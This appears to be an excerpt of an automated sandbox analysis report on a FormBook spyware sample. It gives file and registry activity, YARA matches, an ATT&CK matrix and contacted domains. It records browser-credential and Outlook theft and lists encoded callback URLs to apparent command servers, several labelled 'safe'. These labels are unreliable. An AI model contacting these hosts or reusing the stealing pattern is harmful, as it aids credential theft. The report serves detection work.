Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Queries volume information: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\8SxJ9aYfJ1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\findstr.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.8SxJ9aYfJ1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	412 Process Injection	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8SxJ9aYfJ1.exe	96%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal
8SxJ9aYfJ1.exe	43%	Virustotal		Browse
8SxJ9aYfJ1.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	96%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
desakedungpeluk.com	0%	Virustotal	Browse
miquwawa.com	0%	Virustotal	Browse
artistcalculator.com	0%	Virustotal	Browse
www.zocalo-fuk.com	0%	Virustotal	Browse
dkimhub.com	1%	Virustotal	Browse
www.xyz-store.xyz	0%	Virustotal	Browse
www.forthelement.com	0%	Virustotal	Browse
forthelement.com	1%	Virustotal	Browse
www.miquwawa.com	0%	Virustotal	Browse
www.dkimhub.com	1%	Virustotal	Browse
www.desakedungpeluk.com	0%	Virustotal	Browse
www.artistcalculator.com	0%	Virustotal	Browse
206.23.85.13.in-addr.arpa	1%	Virustotal	Browse
www.michaelstutorgroup.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.jsdelivr.net/npm/bootstrap	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.dkimhub.com/5egn/?9Fjx=LS7e07ng+gHNsyJARIPtuVi+lEkqNBJQ2ublElNdV5gzbr2xH6h/El6SaWwjRr8Uba16H88ExuT+84ut878T3wBrsvgB0imO00p96tUlW1EzL/ongopUwV5X18HPxTdgNiqUy4Q=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://htmlcodex.com	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js	0%	Virustotal		Browse
http://www.tcfreal.top/sg27/	0%	Avira URL Cloud	safe
http://www.michaelstutorgroup.com/7w90/	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Avira URL Cloud	safe
http://www.zocalo-fuk.com/iczo/?h20PB=Ilr0H&9Fjx=JY7jtaSJ5x5vzidknG2ksTpeyXyaG7X3ywH460gVL7Ewt7sZ57bb2J66wgBGIrGl5fwva+984CsI5kCUEaeHAKxito/MplmCBaK67oIqKDsPwPbc7aid6ru9XlM638WWQIDRvms=	0%	Avira URL Cloud	safe
https://track.uc.cn/collect	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.hermandadcoyotes.com/gx7l/	0%	Avira URL Cloud	safe
https://htmlcodex.com	0%	Virustotal		Browse
https://track.uc.cn/collect	0%	Virustotal		Browse
https://www.michaelstutorgroup.com/7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg	0%	Avira URL Cloud	safe
https://pepabo.com/	0%	Avira URL Cloud	safe
https://lolipop.jp/	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api.js?hl=en	0%	Avira URL Cloud	safe
https://hm.baidu.com/hm.js?	0%	Avira URL Cloud	safe
http://www.loangoatworld.com/8y3s/?9Fjx=m+e1HwtEOOeM4G5OXbOM1l1mMhEELbDuBR7SzEsfX5sQt5Y/60pxewufhKo1oWdPn8Rq+iGyekpfb4U1GvT2jbL6nhhjvrxd94xSxVO4NFUPY0kg0texG8HyL5tYcYoZK9KCXOc=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
https://lolipop.jp/	0%	Virustotal		Browse
http://www.forthelement.com/eswm/	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	0%	Avira URL Cloud	safe
https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js	0%	Virustotal		Browse
http://www.michaelstutorgroup.com/7w90/?h20PB=Ilr0H&9Fjx=LhHpT0ljoQdAbtFlhTdeffbRPZ2ExzZlgOFaGkCDeg3jH9QMg622Z6S/PpXr7Dw5Hrqt15Rk+HZEJRRYk4+G8611O/TYHNVjD8KHzBwMH6yNIySy4kYDr0sQvZqeQkDTLiMYeJ4=	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css	0%	Avira URL Cloud	safe
http://www.miquwawa.com/tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9VcwCWuR5N2hVTeUiUKYj3c1cP+6QCcj3wzwE0gmMNT1PJlFHdnkMlbksrXDYRbbL33cvAUMoN8r+Pi3M=	0%	Avira URL Cloud	safe
http://www.artistcalculator.com	0%	Avira URL Cloud	safe
http://www.zocalo-fuk.com/iczo/	0%	Avira URL Cloud	safe
http://www.artistcalculator.com/pf6m/?9Fjx=bj2jTCh2dAa0W37Ors9MIV8y6VuL4TB52i9XdK5qnE1eDYGuKlwknV9AdIGtnY1bTK6+aXD2gMPFTRYJsf/RVFQwT4yLxuuIQKRkes7NkFHq0brUctiaXa3KGHH0n3cgm+LnNOk=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
http://www.dkimhub.com/5egn/	0%	Avira URL Cloud	safe
https://support.lolipop.jp/hc/ja/articles/360049132953	0%	Avira URL Cloud	safe
https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark	0%	Avira URL Cloud	safe
http://tempuri.org/dxsss.xsd	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404	0%	Avira URL Cloud	safe
http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif	0%	Avira URL Cloud	safe
https://code.jquery.com/jquery-3.4.1.min.js	0%	Avira URL Cloud	safe
http://www.noghteyab.com/f97t/	0%	Avira URL Cloud	safe
http://www.ngkwnq.xyz/d35k/	0%	Avira URL Cloud	safe
http://www.desakedungpeluk.com/8vum/	0%	Avira URL Cloud	safe
https://cdn.jsdelivr.net/npm/bootstrap-icons	0%	Avira URL Cloud	safe
http://www.hermandadcoyotes.com/gx7l/?9Fjx=a7hzNdnkeS27kktwRLGSx8yR2sA6hGpGYEa4s+kW8/8nhO4qbMwiGFPThwQr7Jt1vJRCiF4mQ47wrk5EK+BQCUwjbLnD+Licdnqi1ONE6USu+A5nC085uF77bSHLzlvxtDSsS9g=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js	0%	Avira URL Cloud	safe
http://www.artistcalculator.com/pf6m/	0%	Avira URL Cloud	safe
http://miquwawa.com/tqql/?h20PB=Ilr0H&9Fjx=u0XZF227Y/r9f3hknYKw3A/OKyua8wzaE5MpTM9c21roNqnsj5Gisp9Vc	0%	Avira URL Cloud	safe
http://www.xyz-store.xyz/ixgj/	0%	Avira URL Cloud	safe
http://www.xyz-store.xyz/ixgj/?9Fjx=/Zj6VqX56ByDodokLRjPKDm3Pwn2S1h1h7pQZ2SgqDdN9OrisfEzogZ++nqPS1/BV9/5rcururFkQ+JMtWq084ODcNTM6ri6BugJHEDlWjTEcfv6bdNq3ciQP3N1zgfhFVTfb+g=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
http://www.tcfreal.top/sg27/?9Fjx=cpYt0YSQq6qumPKnLg+mC8LQzbjhCfVjUwEln5zritMpGV/+kM1tERFpp4gfmVNp46bstuO0H+g7H2/quwpl6ls6SEGImodBdGoSGHjCZU2G7An66QSlhEKUMH7zQGocUjr8wdY=&h20PB=Ilr0H	0%	Avira URL Cloud	safe
http://www.loangoatworld.com/8y3s/	0%	Avira URL Cloud	safe
